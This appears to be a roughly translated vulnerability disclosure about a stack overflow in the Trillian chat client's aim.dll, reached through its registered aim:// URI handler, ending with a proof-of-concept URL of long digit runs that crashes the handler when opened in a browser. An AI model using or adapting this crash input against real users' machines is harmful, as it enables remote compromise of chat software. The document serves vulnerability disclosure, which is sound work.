Stack Overflow in Trillian's aim. dll through the aim: // URI
The Trillian application is a tool that allows users to chat against SS multipleprotocols, such as aim, IRC, ICQ, Yahoo !, And MSN.
When Trillian is installed,
AIM: // URI will be registered in the Windows registry and associated with the command
'Rundll32.exe "C:/program files/Trillian/plugins/aim. DLL ", aim_util_urlhandler url =" % 1 "ini =" C:/program files/Trillian/users/default/Cache/pending_aim.ini "'.
As you can see, calling the aim: // protocol will spawn a rundll32.exe process which will load aim. DLL withthe specified options. the value that is put into aim_util_urlhandler URL is controlled bythe user through the URI, such as aim: // myurl. this value is later copied withoutbounds checking and an attacker can use this to cause a stack overflow exception. accessing the following URL from IE6, IE7, or Firefox will trigger a stackoverflow:
AIM: /// #1111111/1111111111111111111111111111111111111111111111111111111111111
2222222222222222222222222222222222222222222222222222222222222
3333333333333333333333333333333333333333333333333333333333333
4444444444444444444444444444444444444444444444444444444444444
5555555555555555555555555555555555555555555555555555555555555
6666666aaaabbbb66666666666666666666666666666666666666666666
6666666666666667777777777777777777777777777777777777777777777777777777777777
8888888888888888888888888888888888888888888888888888888888888
9999999999999999999999999999999999999999999999999999999999999
0000000000000000000000000000000000000000000000000000000000000